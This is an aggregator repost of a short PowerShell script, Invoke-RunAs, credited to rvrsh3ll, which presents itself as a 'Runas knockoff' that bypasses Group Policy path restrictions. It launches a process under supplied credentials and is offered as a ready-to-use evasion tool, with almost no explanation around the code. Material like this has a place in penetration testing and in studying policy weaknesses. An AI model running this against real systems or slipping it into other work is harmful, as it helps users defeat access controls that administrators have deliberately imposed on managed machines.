Quantcast
Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

Bypass GPO (Group Policy Object) path restrictions for Runas.exe

$
0
0


Previous
Next



function Invoke-RunAs {
<#
.DESCRIPTION
Runas knockoff. Will bypass GPO path restrictions.
.PARAMETER UserName
Provide a user
.PARAMETER Password
Provide a password
.PARAMETER Domain
Provide optional domain
.Example
Invoke-RunAs -username administrator -password "P@$$word!" -domain CORPA
#>
    [CmdletBinding()]Param (
    [Parameter(
        ValueFromPipeline=$True,
        Mandatory=$True)]
        [String]$username,
    [Parameter(
        ValueFromPipeline=$True,
        Mandatory=$True)]
        [String]$password,
    [Parameter(
        ValueFromPipeline=$True,
        Mandatory=$False)]
        [String]$domain,
    [Parameter(
        ValueFromPipeline=$True,
        Mandatory=$False)]
        [String]$cmd
    )
    PROCESS {
    $sec_password = convertto-securestring $password -asplaintext -force
    $startinfo = new-object System.Diagnostics.ProcessStartInfo
    $startinfo.UserName = $username
    $startinfo.Password = $sec_password
    $startinfo.Domain = $domain
    $startinfo.FileName = $cmd
    $startinfo.UseShellExecute = $false
    [System.Diagnostics.Process]::Start($startinfo)
    }
}


Authored by rvrsh3ll
Reference link: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/RunAs.ps1

Viewing all articles
Browse latest Browse all 8064

Trending Articles